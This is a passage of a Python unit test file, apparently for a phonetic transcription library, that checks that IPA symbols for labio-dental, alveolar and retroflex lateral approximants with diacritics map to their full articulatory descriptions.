def test_ʋ̊ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ˠ")
self.assertEqual(actual, expected)
def test_ʋ̥ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labio-dental approximant pulmonic egressive consonant
def test_ʋ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ˤ")
self.assertEqual(actual, expected)
def test_ʋ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced labio-dental approximant pulmonic egressive consonant
def test_ʋ_is_the_representation_of_the_voiced_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ")
self.assertEqual(actual, expected)
# voiced labialized labio-dental approximant pulmonic egressive consonant
def test_ʋʷ_is_the_representation_of_the_voiced_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʷ")
self.assertEqual(actual, expected)
# voiced palatalized labio-dental approximant pulmonic egressive consonant
def test_ʋʲ_is_the_representation_of_the_voiced_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʲ")
self.assertEqual(actual, expected)
# voiced velarized labio-dental approximant pulmonic egressive consonant
def test_ʋˠ_is_the_representation_of_the_voiced_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labio-dental approximant pulmonic egressive consonant
def test_ʋˤ_is_the_representation_of_the_voiced_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋˤ")
self.assertEqual(actual, expected)
# voiced aspirated labio-dental approximant pulmonic egressive consonant
def test_ʋʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labio-dental approximant pulmonic egressive consonant
def test_ʋʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰʷ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labio-dental approximant pulmonic egressive consonant
def test_ʋʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰʲ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labio-dental approximant pulmonic egressive consonant
def test_ʋʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰˠ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labio-dental approximant pulmonic egressive consonant
def test_ʋʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰˤ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar approximant pulmonic egressive consonant
def test_ɹ̊_is_the_representation_of_the_voiceless_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊")
self.assertEqual(actual, expected)
def test_ɹ̥_is_the_representation_of_the_voiceless_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar approximant pulmonic egressive consonant
def test_ɹ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʷ")
self.assertEqual(actual, expected)
def test_ɹ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar approximant pulmonic egressive consonant
def test_ɹ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʲ")
self.assertEqual(actual, expected)
def test_ɹ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar approximant pulmonic egressive consonant
def test_ɹ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ˠ")
self.assertEqual(actual, expected)
def test_ɹ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar approximant pulmonic egressive consonant
def test_ɹ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ˤ")
self.assertEqual(actual, expected)
def test_ɹ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar approximant pulmonic egressive consonant
def test_ɹ_is_the_representation_of_the_voiced_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ")
self.assertEqual(actual, expected)
# voiced labialized alveolar approximant pulmonic egressive consonant
def test_ɹʷ_is_the_representation_of_the_voiced_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar approximant pulmonic egressive consonant
def test_ɹʲ_is_the_representation_of_the_voiced_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar approximant pulmonic egressive consonant
def test_ɹˠ_is_the_representation_of_the_voiced_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar approximant pulmonic egressive consonant
def test_ɹˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar approximant pulmonic egressive consonant
def test_ɹʰ_is_the_representation_of_the_voiced_aspirated_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar approximant pulmonic egressive consonant
def test_ɹʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰʷ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar approximant pulmonic egressive consonant
def test_ɹʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰʲ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar approximant pulmonic egressive consonant
def test_ɹʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰˠ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar approximant pulmonic egressive consonant
def test_ɹʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰˤ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰˤ")
self.assertEqual(actual, expected)
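# These method names embed IPA base letters, combining diacritics, and modifier
# letters directly. Python normalizes identifiers to NFKC (PEP 3131); the marks
# used here have no compatibility decompositions or canonical compositions, so
# names differing only by ring-above vs. ring-below (e.g. the ɭ̊/ɭ̥ pairs below)
# remain distinct test methods.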
# voiceless retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊_is_the_representation_of_the_voiceless_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊")
self.assertEqual(actual, expected)
def test_ɭ̥_is_the_representation_of_the_voiceless_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥")
self.assertEqual(actual, expected)
# voiceless labialized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʷ")
self.assertEqual(actual, expected)
def test_ɭ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʲ")
self.assertEqual(actual, expected)
def test_ɭ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ˠ")
self.assertEqual(actual, expected)
def test_ɭ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ˤ")
self.assertEqual(actual, expected)
def test_ɭ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex lateral approximant pulmonic egressive consonant
def test_ɭ_is_the_representation_of_the_voiced_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ")
self.assertEqual(actual, expected)
# voiced labialized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʷ_is_the_representation_of_the_voiced_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʲ_is_the_representation_of_the_voiced_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex lateral approximant pulmonic egressive consonant
def test_ɭˠ_is_the_representation_of_the_voiced_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex lateral approximant pulmonic egressive consonant
def test_ɭˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭˤ")
self.assertEqual(actual, expected)
# voiced aspirated retroflex lateral approximant pulmonic egressive consonant
def test_ɭʰ_is_the_representation_of_the_voiced_aspirated_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰʷ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰʲ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰˠ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
